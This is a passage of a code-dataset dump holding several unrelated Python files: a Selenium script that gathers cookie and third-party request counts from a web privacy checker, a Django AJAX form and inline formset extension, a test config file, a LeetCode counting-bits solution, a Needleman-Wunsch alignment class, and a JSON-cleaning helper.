r\"(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+\" \\\n r\"|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n\nurlDatabase = open(\"../export-ITM_URL_2013-10-14.csv\", \"r\", encoding=\"utf-8\").read()\npreviousUrl = []\n\noptions = Options()\noptions.add_argument(r\"user-data-dir=C:\\selenium\")\n\nverifFile.verif(\"../result/result.csv\",\n \"name;\"\n \"First-party cookies number; \"\n \"First-party cookies domains; \"\n \"Third-party cookies number; \"\n \"Third-party cookies domains; \"\n \"Third-party requests number; \"\n \"Third-party requests domains \\n\")\n\nverifFile.verif(\"../result/urlNotWorking.log\",\n \"Url with 404 or 403 error \\n\")\n\nverifFile.verif(\"../result/error.log\",\n \"url dont il y a eu un probleme avec l'analyse \\n\")\n\nbrowser = webdriver.Chrome(executable_path=r'../lib/chromedriver.exe', options=options, )\nbrowser.get(webprivacycheckURL)\nbrowser.implicitly_wait(5)\n\nfor field in urlDatabase.split('\\n'):\n for url in re.findall(urlRegex, field):\n currentURL = url[0]\n if currentURL not in previousUrl:\n if os.path.exists(f\"../result/{resultFilename.resultFileName(currentURL)}.csv\"):\n print(\"Aborted, report exist for : \" + currentURL)\n continue\n else:\n print(\"Work in progress : \" + currentURL)\n if not urlChecker.urlChecker(currentURL):\n with open(\"../result/urlNotWorking.log\", \"a\") as notWorkingLog:\n notWorkingLog.write(currentURL + \"\\n\")\n continue\n else:\n with open(\"../result/result.csv\", \"a\") as resultLine:\n browser.find_element_by_name(\"url\").send_keys(currentURL + Keys.ENTER)\n try:\n WebDriverWait(browser, 60) \\\n .until(EC.presence_of_all_elements_located((By.CLASS_NAME, \"light\")))\n except selenium.common.exceptions.TimeoutException as e:\n try:\n browser.find_element_by_xpath(\"//a[contains(text(),'Try again?')]\")\n WebDriverWait(browser, 60) \\\n .until(EC.presence_of_all_elements_located((By.CLASS_NAME, \"light\")))\n except Exception as e:\n with open(\"../result/error.log\", \"a\") as errorLog:\n print(\"Something went wrong\")\n errorLog.write(currentURL + '\\n')\n continue\n\n firstPartyCookieList = []\n thirdpartyCookieList = []\n thirdpartyRequestsList = []\n\n with open(f\"../result/{resultFilename.resultFileName(currentURL)}.csv\",\n \"w\") as currentResult:\n currentResult.write(\"Domain, Name, Expires on \\n\")\n data = browser.find_elements_by_class_name(\"cookies\")\n\n try:\n cookiesNumbers = browser.find_elements_by_css_selector('#cookies + p > strong')\n except selenium.common.exceptions.NoSuchElementException as e:\n cookiesNumbers = []\n print(e)\n\n try:\n firstPartyCookieNumber = cookiesNumbers[0].text\n except IndexError as e:\n firstPartyCookieNumber = 0\n\n try:\n thirdpartyCookieNumber = cookiesNumbers[1].text\n except IndexError as e:\n thirdpartyCookieNumber = 0\n\n try:\n requestsNumber = browser.find_elements_by_css_selector(\"#requests+ p > strong\")\n except selenium.common.exceptions.NoSuchElementException as e:\n requestsNumber = []\n print(e)\n\n try:\n thirdpartyRequestsNumber = requestsNumber[0].text\n except IndexError as e:\n thirdpartyRequestsNumber = 0\n\n try:\n if data[0]:\n currentResult.write(f\"\\n ======== First-party cookies \"\n f\"({firstPartyCookieNumber}) \"\n f\"========\\n\")\n for cookie in data[0].find_elements_by_tag_name(\"tr\")[1:]:\n cookieData = cookie.find_elements_by_tag_name(\"td\")\n currentResult.write(f\"{cookieData[0].text}; \"\n f\"{cookieData[1].text}; \"\n f\"{cookieData[3].text} \\n\")\n\n 
if cookieData[0].text not in firstPartyCookieList:\n firstPartyCookieList.append(cookieData[0].text)\n except IndexError as e:\n currentResult.write(f\"\\n ======== First-party cookies \"\n f\"({firstPartyCookieNumber}) \"\n f\"========\\n\")\n print(\"No First-party cookie\")\n\n try:\n if data[1]:\n currentResult.write(f\"\\n ======== Third-party cookies \"\n f\"({thirdpartyCookieNumber}) \"\n f\"========\\n\")\n for cookie in data[1].find_elements_by_tag_name(\"tr\")[1:]:\n cookieData = cookie.find_elements_by_tag_name(\"td\")\n currentResult.write(f\"{cookieData[0].text}; \"\n f\"{cookieData[1].text}; \"\n f\"{cookieData[3].text} \\n\")\n\n if cookieData[0].text not in thirdpartyCookieList:\n thirdpartyCookieList.append(cookieData[0].text)\n except IndexError as e:\n currentResult.write(f\"\\n ======== Third-party cookies \"\n f\"({thirdpartyCookieNumber}) \"\n f\"========\\n\")\n print(\"No third-party cookie\")\n\n try:\n requestData = browser.find_element_by_class_name(\"requests\")\n if requestData:\n currentResult.write(f\"\\n ======== Third-party requests \"\n f\" ({thirdpartyRequestsNumber}) \"\n f\"========\\n\"\n f\"Host; Classification \\n\")\n for request in requestData.find_elements_by_tag_name(\"tr\")[1:]:\n requestField = request.find_elements_by_tag_name(\"td\")\n currentResult.write(f\"{requestField[0].text}; \"\n f\"{requestField[1].text} \\n\")\n\n thirdpartyRequestsList.append(requestField[0].text)\n except selenium.common.exceptions.NoSuchElementException as e:\n print(\"No third-party requests\")\n\n resultLine.write(f\"{currentURL}; \"\n f\"{firstPartyCookieNumber}; \"\n f\"{firstPartyCookieList}; \"\n f\"{thirdpartyCookieNumber}; \"\n f\"{thirdpartyCookieList}; \"\n f\"{thirdpartyRequestsNumber}; \"\n f\"{thirdpartyRequestsList} \\n\"\n )\n print(\"Finished\")\n previousUrl.append(currentURL)\n\nbrowser.quit()\n","sub_path":"src/useWebPrivacyCheck.py","file_name":"useWebPrivacyCheck.py","file_ext":"py","file_size_in_byte":9507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"128414987","text":"from django.utils import six\r\nfrom django.forms.models import ModelFormMetaclass, inlineformset_factory,\\\r\n BaseModelForm, BaseInlineFormSet, ModelForm, ModelChoiceField,\\\r\n InlineForeignKeyField\r\nfrom django.forms.utils import ErrorList, ErrorDict\r\nfrom django.utils.html import conditional_escape\r\nfrom django.utils.encoding import force_text\r\nfrom django.utils.safestring import mark_safe\r\nfrom collections import OrderedDict\r\nimport copy\r\nfrom django.forms.forms import Form\r\nfrom django.forms.formsets import ORDERING_FIELD_NAME, DELETION_FIELD_NAME\r\nfrom django.forms.fields import IntegerField, BooleanField\r\nfrom django.utils.translation import ugettext as _\r\nfrom django.forms.widgets import HiddenInput\r\nfrom django.utils.text import capfirst\r\n\r\n\r\nclass AjaxFormMixin():\r\n \"\"\"Form rendering useful for ajax \"\"\"\r\n def _ajax_html_output(self, normal_row, error_row, row_ender, help_text_html, errors_on_separate_row):\r\n \"Helper function for outputting HTML. 
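Renders each visible field with normal_row and appends a per-field error_row placeholder (errid_<fieldname>) for client-side updates. 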
Used by as_table(), as_ul(), as_p().\"\r\n top_errors = self.non_field_errors() # Errors that should be displayed above all fields.\r\n output, hidden_fields = [], []\r\n\r\n for name, field in self.fields.items():\r\n html_class_attr = ''\r\n bf = self[name]\r\n \r\n widget_attrs = bf.field.widget.attrs\r\n if not \"class\" in widget_attrs: \r\n widget_attrs[\"class\"] = \"\"\r\n \r\n widget_attrs[\"class\"] += \" form-control\"\r\n \r\n # Escape and cache in local variable.\r\n bf_errors = self.error_class([conditional_escape(error) for error in bf.errors])\r\n if bf.is_hidden:\r\n if bf_errors:\r\n top_errors.extend(\r\n [_('(Hidden field %(name)s) %(error)s') % {'name': name, 'error': force_text(e)}\r\n for e in bf_errors])\r\n hidden_fields.append(six.text_type(bf))\r\n else:\r\n # Create a 'class=\"...\"' attribute if the row should have any\r\n # CSS classes applied.\r\n css_classes = bf.css_classes()\r\n if css_classes:\r\n html_class_attr = ' class=\"%s\"' % css_classes\r\n\r\n if bf.label:\r\n label = conditional_escape(force_text(bf.label))\r\n label = bf.label_tag(label) or ''\r\n else:\r\n label = ''\r\n\r\n if field.help_text:\r\n help_text = help_text_html % force_text(field.help_text)\r\n else:\r\n help_text = ''\r\n \r\n output.append(normal_row % {\r\n 'label': force_text(label),\r\n 'field': six.text_type(bf),\r\n 'help_text': help_text,\r\n 'html_class_attr': html_class_attr,\r\n 'field_name': bf.html_name\r\n })\r\n \r\n #Errors\r\n err_id = 'id=\"errid_%s\"' % bf.html_name\r\n err_class = \"error\"\r\n output.append(error_row % {\r\n \"err\": force_text(bf_errors), \r\n \"err_id\": err_id,\r\n \"err_class\": err_class\r\n })\r\n\r\n #if top_errors:\r\n err_class = \"top-error error\"\r\n output.insert(0, error_row % {\r\n \"err\": force_text(bf_errors), \r\n \"err_class\": err_class,\r\n \"err_id\": \"\"\r\n })\r\n\r\n if hidden_fields: # Insert any hidden fields in the last row.\r\n str_hidden = ''.join(hidden_fields)\r\n if output:\r\n last_row = output[-1]\r\n # Chop off the trailing row_ender (e.g. '') and\r\n # insert the hidden fields.\r\n if not last_row.endswith(row_ender):\r\n # This can happen in the as_p() case (and possibly others\r\n # that users write): if there are only top errors, we may\r\n # not be able to conscript the last row for our purposes,\r\n # so insert a new, empty row.\r\n last_row = (normal_row % {'errors': '', 'label': '',\r\n 'field': '', 'help_text': '',\r\n 'html_class_attr': html_class_attr})\r\n output.append(last_row)\r\n output[-1] = last_row[:-len(row_ender)] + str_hidden + row_ender\r\n else:\r\n # If there aren't any rows in the output, just append the\r\n # hidden fields.\r\n output.append(str_hidden)\r\n return mark_safe('\\n'.join(output))\r\n \r\n def ajax_as_table(self):\r\n \"Returns this form rendered as HTML s -- excluding the
<table></table>.\"\r\n return self._ajax_html_output(\r\n normal_row='<tr%(html_class_attr)s><th>%(label)s</th><td>%(field)s</td></tr>',\r\n error_row='<tr %(err_id)s class=\"%(err_class)s\"><td colspan=\"2\">%(err)s</td></tr>',\r\n row_ender='</td></tr>',\r\n help_text_html='<span class=\"helptext\">%s</span>',\r\n errors_on_separate_row=True)\r\n\r\n def ajax_as_ul(self):\r\n \"Returns this form rendered as HTML <li>s -- excluding the <ul></ul>.\"\r\n return self._ajax_html_output(\r\n normal_row='<li%(html_class_attr)s>%(label)s %(field)s</li>',\r\n error_row='<li %(err_id)s class=\"%(err_class)s\">%(err)s</li>',\r\n row_ender='</li>',\r\n help_text_html='<span class=\"helptext\">%s</span>',\r\n errors_on_separate_row=True)\r\n \r\n def ajax_as_p(self):\r\n \"Returns this form rendered as HTML <p>s.\"\r\n return self._ajax_html_output(\r\n normal_row='<p%(html_class_attr)s>%(label)s %(field)s</p>',\r\n error_row='<p %(err_id)s class=\"%(err_class)s\">%(err)s</p>',\r\n row_ender='</p>',\r\n help_text_html='<span class=\"helptext\">%s</span>',\r\n errors_on_separate_row=True)\r\n \r\n\r\n \r\nclass AjaxForm(Form, AjaxFormMixin):\r\n pass\r\n\r\n\r\n\r\nclass AjaxModelForm(ModelForm, AjaxFormMixin):\r\n pass\r\n\r\n\r\n\r\nclass ExtendedFormSet(BaseInlineFormSet):\r\n \r\n template_form = ('
<div class=\"inline-form\">'\r\n '<h4>%(title)s</h4>%(form)s'\r\n '</div>')\r\n template_formset = ('<div class=\"inline-formset\" id=\"formset_%(prefix)s\">'\r\n '<h4>%(title)s</h4>'\r\n '%(forms)s'\r\n ''\r\n '</div>
      ')\r\n \r\n def _ajax_html_output(self, normal_row, error_row, row_ender, help_text_html,\r\n errors_on_separate_row, line_start, line_el, line_end, \r\n tform=template_form, tformset=template_formset):\r\n \r\n vname_plural = self.form._meta.model._meta.verbose_name_plural.capitalize()\r\n vname = self.form._meta.model._meta.verbose_name.capitalize()\r\n \r\n output = [six.text_type(self.management_form),]\r\n for form in self:\r\n if isinstance(form, ExtendedForm):\r\n ho = form._ajax_html_output(normal_row, error_row, row_ender, help_text_html, \r\n errors_on_separate_row, line_start, line_el, line_end)\r\n else:\r\n ho = form._ajax_html_output(normal_row, error_row, row_ender, help_text_html, \r\n errors_on_separate_row)\r\n \r\n output.append(tform % {\"form\": ho, \"title\": vname })\r\n \r\n forms = ' '.join(output)\r\n \r\n forms = tformset % {\"forms\": forms, \"title\": vname_plural, \"prefix\": self.prefix}\r\n \r\n return mark_safe(forms)\r\n \r\n def ajax_empty_form_as_p(self):\r\n vname = self.form._meta.model._meta.verbose_name.capitalize()\r\n return self.template_form % {\"form\": self.empty_form.ajax_as_p(), \"title\": vname }\r\n \r\n def add_fields(self, form, index):\r\n \"\"\"A hook for adding extra fields on to each form instance.\"\"\"\r\n \r\n ###Add a hidden field for the object's primary key.\r\n from django.db.models import AutoField, OneToOneField, ForeignKey\r\n self._pk_field = pk = self.model._meta.pk\r\n # If a pk isn't editable, then it won't be on the form, so we need to\r\n # add it here so we can tell which object is which when we get the\r\n # data back. Generally, pk.editable should be false, but for some\r\n # reason, auto_created pk fields and AutoField's editable attribute is\r\n # True, so check for that as well.\r\n\r\n def pk_is_not_editable(pk):\r\n return ((not pk.editable) or (pk.auto_created or isinstance(pk, AutoField))\r\n or (pk.rel and pk.rel.parent_link and pk_is_not_editable(pk.rel.to._meta.pk)))\r\n if pk_is_not_editable(pk) or pk.name not in form.fields:\r\n if form.is_bound:\r\n pk_value = form.instance.pk\r\n else:\r\n try:\r\n if index is not None:\r\n pk_value = self.get_queryset()[index].pk\r\n else:\r\n pk_value = None\r\n except IndexError:\r\n pk_value = None\r\n if isinstance(pk, OneToOneField) or isinstance(pk, ForeignKey):\r\n qs = pk.rel.to._default_manager.get_queryset()\r\n else:\r\n qs = self.model._default_manager.get_queryset()\r\n qs = qs.using(form.instance._state.db)\r\n if form._meta.widgets:\r\n widget = form._meta.widgets.get(self._pk_field.name, HiddenInput)\r\n else:\r\n widget = HiddenInput\r\n form.fields[self._pk_field.name] = ModelChoiceField(qs, initial=pk_value, required=False, widget=widget)\r\n if isinstance(form, ExtendedForm):\r\n form.rfields[''].append(self._pk_field.name)\r\n \r\n #BaseFormSet \r\n if self.can_order:\r\n # Only pre-fill the ordering field for initial forms.\r\n if index is not None and index < self.initial_form_count():\r\n form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), initial=index + 1, required=False)\r\n if isinstance(form, ExtendedForm):\r\n form.rfields[''].append(ORDERING_FIELD_NAME)\r\n else:\r\n form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), required=False)\r\n if isinstance(form, ExtendedForm):\r\n form.rfields[''].append(ORDERING_FIELD_NAME)\r\n if self.can_delete:\r\n form.fields[DELETION_FIELD_NAME] = BooleanField(label=_('Delete'), required=False)\r\n if isinstance(form, ExtendedForm):\r\n 
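# Register the auto-added deletion flag under the default ('') field group so ExtendedForm renders it with the other fields.\r\n 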
form.rfields[''].append(DELETION_FIELD_NAME)\r\n \r\n #InlineFormSet \r\n if self._pk_field == self.fk:\r\n name = self._pk_field.name\r\n kwargs = {'pk_field': True}\r\n else:\r\n # The foreign key field might not be on the form, so we poke at the\r\n # Model field to get the label, since we need that for error messages.\r\n name = self.fk.name\r\n kwargs = {\r\n 'label': getattr(form.fields.get(name), 'label', capfirst(self.fk.verbose_name))\r\n }\r\n if self.fk.rel.field_name != self.fk.rel.to._meta.pk.name:\r\n kwargs['to_field'] = self.fk.rel.field_name\r\n\r\n form.fields[name] = InlineForeignKeyField(self.instance, **kwargs)\r\n\r\n # Add the generated field to form._meta.fields if it's defined to make\r\n # sure validation isn't skipped on that field.\r\n if form._meta.fields:\r\n if isinstance(form._meta.fields, tuple):\r\n form._meta.fields = list(form._meta.fields)\r\n form._meta.fields.append(self.fk.name)\r\n #if isinstance(form, ExtendedForm):\r\n #form.rfields[''].append(self.fk.name)\r\n\r\n\r\n\r\nclass ExtendedFormMetaclass(ModelFormMetaclass):\r\n\r\n def __new__(cls, name, bases, attrs):\r\n \r\n opts = attrs.get('Meta', None)\r\n inlines = getattr(opts, 'inlines', {})\r\n rfields = getattr(opts, 'fields', {})\r\n lines = getattr(opts, \"lines\", None)\r\n inline_fields = []\r\n \r\n if rfields == \"__all__\" or rfields == {}:\r\n new_class = super().__new__(cls, name, bases, attrs)\r\n rfields = OrderedDict({\"\": list(new_class.base_fields.keys())})\r\n else:\r\n if isinstance(rfields[0], tuple):\r\n rfields = OrderedDict(rfields)\r\n else:\r\n rfields = OrderedDict({\"\": rfields})\r\n \r\n opts.fields = []\r\n for i in rfields.values():\r\n if isinstance(i, str):\r\n i = [i,]\r\n for j in i:\r\n if j in inlines:\r\n inline_fields.append(j)\r\n else:\r\n opts.fields.append(j)\r\n \r\n new_class = super().__new__(cls, name, bases, attrs)\r\n \r\n for k, v in rfields.items():\r\n new_fields = []\r\n for i in range(0, len(v)): \r\n if v[i] in inline_fields or v[i] in new_class.base_fields:\r\n new_fields.append(v[i])\r\n rfields[k] = new_fields\r\n \r\n opts = new_class._meta\r\n \r\n if opts.model:\r\n opts.inlines = {}\r\n for k, v in inlines.items():\r\n v.update({'parent_model': opts.model, 'formset': ExtendedFormSet})\r\n opts.inlines[k] = inlineformset_factory(**v)\r\n \r\n opts.inline_fields = inline_fields\r\n opts.rfields = rfields\r\n \r\n if lines:\r\n for f, t in lines:\r\n fi = ti = None\r\n for n in rfields.values():\r\n try: \r\n fi = n.index(f)\r\n except ValueError:\r\n continue\r\n else:\r\n try:\r\n ti = n[fi + 1:].index(t)\r\n for i in n[fi + 1: ti - 1]:\r\n if i in inline_fields:\r\n raise ValueError()\r\n except ValueError:\r\n raise ValueError(\"Invalid line range! %s - %s\" %(f, t)) #TODO(more informative)\r\n if fi == None:\r\n raise ValueError(\"Invalid line range! 
%s - %s\" %(f, t))\r\n \r\n opts.lines_from = tuple(map(lambda x: x[0], lines))\r\n opts.lines_to = tuple(map(lambda x: x[1], lines))\r\n else:\r\n opts.lines_from = []\r\n opts.lines_to = []\r\n \r\n return new_class\r\n\r\n\r\n\r\nclass BaseExtendedForm(BaseModelForm):\r\n \r\n def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,\r\n initial=None, error_class=ErrorList, label_suffix=None,\r\n empty_permitted=False, instance=None):\r\n super().__init__(data, files, auto_id, prefix, initial, \r\n error_class, label_suffix, empty_permitted, instance)\r\n \r\n self.inlines = {}\r\n for name, iform in self._meta.inlines.items():\r\n self.inlines[name] = iform(data, files, self.instance, prefix=name)\r\n self.rfields = copy.deepcopy(self._meta.rfields)\r\n \r\n def full_clean(self):\r\n \"\"\"\r\n Cleans all of self.data and populates self._errors and\r\n self.cleaned_data.\r\n \"\"\"\r\n self._errors = ErrorDict()\r\n if not self.is_bound: # Stop further processing.\r\n return\r\n self.cleaned_data = {}\r\n # If the form is permitted to be empty, and none of the form data has\r\n # changed from the initial data, short circuit any validation.\r\n if self.empty_permitted and not self.has_changed():\r\n self._clean_inlines() #TODO think\r\n return\r\n\r\n self._clean_fields()\r\n self._clean_form()\r\n self._post_clean()\r\n self._clean_inlines()\r\n \r\n def _clean_inlines(self):\r\n \r\n self._inline_errors = {}\r\n for name, iform in self.inlines.items():\r\n iform.full_clean()\r\n self._inline_errors[name] = iform._errors\r\n \r\n @property\r\n def all_errors(self):\r\n \"Returns an ErrorDict for the data provided for the form\"\r\n if self._errors is None:\r\n self.full_clean()\r\n return { \"form_errors\": self._errors, \"inline_errors\": self._inline_errors }\r\n \r\n def is_valid(self):\r\n valid = super().is_valid()\r\n for iform in self.inlines.values():\r\n valid = valid and iform.is_valid()\r\n \r\n return valid\r\n \r\n \r\n def save_inlines(self, commit=True):\r\n \r\n inlines = []\r\n for iform in self.inlines.values():\r\n inlines.append(iform.save(commit))\r\n \r\n return inlines\r\n \r\n \r\n \r\n def _ajax_html_output(self, normal_row, error_row, row_ender, help_text_html, \r\n errors_on_separate_row, line_start=None, line_el=None, line_end=None):\r\n \"Helper function for outputting HTML. Used by as_table(), as_ul(), as_p().\"\r\n top_errors = self.non_field_errors() # Errors that should be displayed above all fields.\r\n output = []\r\n \r\n rf = self.rfields\r\n for title, fields in rf.items():\r\n need_fieldset = not(len(rf)==1 and title==\"\")\r\n \r\n if need_fieldset:\r\n if title:\r\n title = \"
<legend>%s</legend>\" % title\r\n output.append('<fieldset>
      %s' % title)\r\n \r\n line = []\r\n line_err = []\r\n for name in fields:\r\n if name in self._meta.inline_fields:\r\n output.append(\r\n self.inlines[name]._ajax_html_output(normal_row, error_row, row_ender, \r\n help_text_html, errors_on_separate_row,\r\n line_start, line_el, line_end)\r\n )\r\n else:\r\n \r\n field = self.fields[name]\r\n html_class_attr = ''\r\n bf = self[name]\r\n \r\n \r\n widget_attrs = bf.field.widget.attrs\r\n if not \"class\" in widget_attrs: \r\n widget_attrs[\"class\"] = \"\"\r\n \r\n widget_attrs[\"class\"] += \" form-control\"\r\n \r\n # Escape and cache in local variable.\r\n bf_errors = self.error_class([conditional_escape(error) for error in bf.errors])\r\n \r\n # Create a 'class=\"...\"' attribute if the row should have any\r\n # CSS classes applied.\r\n css_classes = bf.css_classes()\r\n if css_classes:\r\n html_class_attr = '%s' % css_classes\r\n \r\n if bf.label and not bf.is_hidden:\r\n label = conditional_escape(force_text(bf.label))\r\n label = bf.label_tag(label) or ''\r\n else:\r\n label = ''\r\n \r\n if field.help_text:\r\n help_text = help_text_html % force_text(field.help_text)\r\n else:\r\n help_text = ''\r\n \r\n opts = self._meta\r\n ctx = {\r\n 'label': force_text(label),\r\n 'field': six.text_type(bf),\r\n 'help_text': help_text,\r\n 'html_class_attr': html_class_attr,\r\n 'field_name': bf.html_name\r\n }\r\n \r\n #Errors\r\n err_id = 'id=\"errid_%s\"' % bf.html_name\r\n err_class = \"error\"\r\n line_err.append(error_row % {\r\n \"err\": force_text(bf_errors), \r\n \"err_id\": err_id,\r\n \"err_class\": err_class\r\n })\r\n \r\n if name in opts.lines_from:\r\n line.append((line_start + line_el) % ctx)\r\n elif name in opts.lines_to:\r\n line.append((line_el + line_end) % ctx)\r\n output.append(''.join(line))\r\n line.clear()\r\n output.append(''.join(line_err))\r\n line_err.clear()\r\n elif len(line) > 0:\r\n line.append(line_el % ctx)\r\n else:\r\n output.append(normal_row % ctx)\r\n output.append(''.join(line_err))\r\n line_err.clear()\r\n \r\n if need_fieldset:\r\n output.append('
</fieldset>')\r\n \r\n #if top_errors:\r\n err_class = \"top-error error\"\r\n output.insert(0, error_row % {\r\n \"err\": force_text(bf_errors), \r\n \"err_class\": err_class,\r\n \"err_id\": \"\"\r\n })\r\n\r\n return mark_safe('\\n'.join(output))\r\n \r\n def ajax_as_table(self):\r\n \"Returns this form rendered as HTML <tr>s -- excluding the <table></table>.\"\r\n return self._ajax_html_output(\r\n normal_row='<tr%(html_class_attr)s><th>%(label)s</th><td>%(field)s</td></tr>',\r\n error_row='<tr %(err_id)s class=\"%(err_class)s\"><td colspan=\"2\">%(err)s</td></tr>',\r\n row_ender='</td></tr>',\r\n help_text_html='<span class=\"helptext\">%s</span>',\r\n errors_on_separate_row=True)\r\n\r\n def ajax_as_ul(self):\r\n \"Returns this form rendered as HTML <li>s -- excluding the <ul></ul>.\"\r\n return self._ajax_html_output(\r\n normal_row='<li%(html_class_attr)s>%(label)s %(field)s</li>',\r\n error_row='<li %(err_id)s class=\"%(err_class)s\">%(err)s</li>',\r\n row_ender='</li>',\r\n help_text_html='<span class=\"helptext\">%s</span>',\r\n errors_on_separate_row=True,\r\n line_start='<li>', #TODO (autodetection)\r\n line_el='%(label)s %(field)s',\r\n line_end='</li>')\r\n \r\n def ajax_as_p(self):\r\n \"Returns this form rendered as HTML <p>s.\"\r\n return self._ajax_html_output(\r\n normal_row='<p%(html_class_attr)s>%(label)s %(field)s</p>',\r\n error_row='<p %(err_id)s class=\"%(err_class)s\">%(err)s</p>',\r\n row_ender='</p>',\r\n help_text_html='<span class=\"helptext\">%s</span>',\r\n errors_on_separate_row=True,\r\n line_start='<p>', #TODO (autodetection)\r\n line_el='%(label)s %(field)s',\r\n line_end='</p>
')\r\n \r\n def add_field(self, name, field, group=\"\"):\r\n self.fields[name] = field\r\n self.rfields[group].append(name)\r\n \r\n\r\n\r\nclass ExtendedForm(six.with_metaclass(ExtendedFormMetaclass, BaseExtendedForm)):\r\n pass\r\n \r\n ","sub_path":"utils/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":23763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"55677729","text":"import os\nimport time\n\n# Project root path\nPATH = os.path.join(os.getcwd(), 'Testapi')\n# Log directory\nLOG_PATH = os.path.join(PATH, 'log')\n# Log file name (defaults to the current date)\nLOG_NAME = os.path.join(LOG_PATH, f'{time.strftime(\"%Y-%m-%d\", time.localtime())}.log')\n# Test case document (must be in .xls format)\nFILES_NAME = 'APi.xls'\n# API document directory\nFILES_PATH = os.path.join(PATH, 'files')\n# Test file\nFILES = os.path.join(FILES_PATH, FILES_NAME)\n# Test report directory\nSAVE_CASE = os.path.join(PATH, 'report')\n# Test report file name (defaults to the current time)\nREPORT_NAME = time.strftime(\"%Y-%m-%d %H-%M-%S\", time.localtime())\n# Full path of the saved test report\nREPORT_PATH = os.path.join(SAVE_CASE, f'{REPORT_NAME}' + '.html')\n# Path of the .xls report\nREPORT_SAVE = os.path.join(SAVE_CASE, f'{time.strftime(\"%Y-%m-%d %H-%M-%S\", time.localtime())}.xls')\n# Index of the worksheet to operate on\nTABLE = 0\n# Test case directory\nTESTCASE = os.path.join(PATH, 'testcase')\n# Maximum API response time\nRESPONSE_TIME = 2\n# Response parameters to check\nRESPONSE_MESSAGE = {'code': 200}\n","sub_path":"Testapi/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"360497902","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Mike\n# @Contact : 597290963@qq.com\n# @Time : 2021/2/16 15:01\n# @File : CountBits.py\nfrom typing import List\n\n\"\"\"\nGiven a non-negative integer num, for every number i in the range 0 ≤ i ≤ num, compute the number of 1s in its binary representation and return them as an array.\n\nExample 1:\n\nInput: 2\nOutput: [0,1,1]\nExample 2:\n\nInput: 5\nOutput: [0,1,1,2,1,2]\n\nSource: LeetCode\nLink: https://leetcode-cn.com/problems/counting-bits\nThe copyright belongs to LeetCode; for commercial reprints please contact them for authorization, and for non-commercial reprints please cite the source.\n\"\"\"\n\n\nclass Solution:\n\n def countBits(self, num: int) -> List[int]:\n dp = [0] * (num + 1)\n for i in range(1, num + 1):\n dp[i] = dp[i >> 1] + (i & 1)\n\n return dp\n\n\nif __name__ == '__main__':\n print(Solution().countBits(4))\n","sub_path":"datastructure/dp_exercise/CountBits.py","file_name":"CountBits.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"230536776","text":"from alignment import base\n\n\nclass NeedlemanWunsch(base.OptimalAlignment):\n \"\"\"Needleman-Wunsch algorithm.\"\"\"\n\n def _add_gap_penalties(self, seq1, seq2):\n \"\"\"Fill in the first row and column.\"\"\"\n for i in range(1, len(seq1) + 1):\n self.nm_matrix[i][0] = self.nm_matrix[i - 1][0] \\\n + self.score[seq1[i - 1]][seq2[0]]\n\n for j in range(1, len(seq2) + 1):\n self.nm_matrix[0][j] = self.nm_matrix[0][j - 1] \\\n + self.score[seq1[0]][seq2[j - 1]]\n\n def _start_position(self):\n \"\"\"The Needleman-Wunsch algorithm starts from the last cell.\"\"\"\n i = len(self.seq1)\n j = len(self.seq2)\n return i, j\n\n def _best_score(self, diagscore, topscore, leftscore, i, j):\n self.nm_matrix[i][j] = max(diagscore, topscore, leftscore)\n\n def show_result(self):\n # Build a pretty match line between the aligned symbols\n alseq1 = self.alseq1\n alseq2 = self.alseq2\n max_lines = max(len(alseq1), len(alseq2))\n min_lines = min(len(alseq1), len(alseq2))\n allines = ''\n for i in range(max_lines):\n if i < min_lines:\n if alseq1[i] == alseq2[i]:\n allines += '|'\n elif alseq1[i] != 
alseq2[i]:\n allines += ' '\n\n # Result\n print(\"\\nGlobal alignment result:\\n\\n\")\n print(alseq1 + '\\n' + allines + '\\n' + alseq2 + '\\n')\n","sub_path":"1-autumn-2019/algo/homework/HW2/alignment/needwun.py","file_name":"needwun.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"589486151","text":"\n\ndef alter_range(interval_list):\n number_of_intervals = len(interval_list)\n\n new_interval = []\n counter = 1\n for i in range(number_of_intervals-1):\n if interval_list[i]['maxValue']== interval_list[i+1]['minValue']:\n counter = counter + 1\n new_interval = [{'minValue': interval_list[i]['minValue'], 'maxValue':interval_list[i+1]['maxValue'] , 'counter': counter}]\n\n\n \"\"\" If the intervals were non-consecutive intervals, then return original interval list. Otherwise return new list \n with just one interval\"\"\"\n if len(new_interval) ==0:\n return interval_list\n else:\n print(new_interval)\n return new_interval # doesn't contain a counter\n\n\n\n\nclass Backend_Helper:\n\n\n @staticmethod\n def clean_frontend_json(json_dict) :\n result = dict()\n for field in json_dict :\n field_value_name = field+\"Value\"\n field_range_name = field+\"Range\"\n if field_range_name in json_dict[field] :\n if len(json_dict[field][field_range_name]) > 0 : #json_dict ['price']['priceRange']\n \"\"\" If the user entered multiple intervals via checkbox, then process the interval to be one interval \n or multiple intervals if not consecutive intervals\"\"\"\n if len(json_dict[field].get(field_range_name))>1:\n json_dict[field][field_range_name] = alter_range(json_dict[field][field_range_name])\n result.update({field:json_dict[field]})\n elif field_value_name in json_dict[field] :\n if len(json_dict[field][field_value_name]) > 0 :\n result.update({field:json_dict[field]})\n elif \"intent\" in json_dict[field]:\n result.update({field:json_dict[field]})\n return result\n\n\n\n @staticmethod\n def clean_for_alexa(json_dict):\n #data[intent_variable].update({\"intent\":intent,\"value\":intent_variable_value})\n\n result = dict()\n intent = json_dict[\"intent\"]\n intent_variable = json_dict[\"intentVariable\"]\n intent_variable_value = 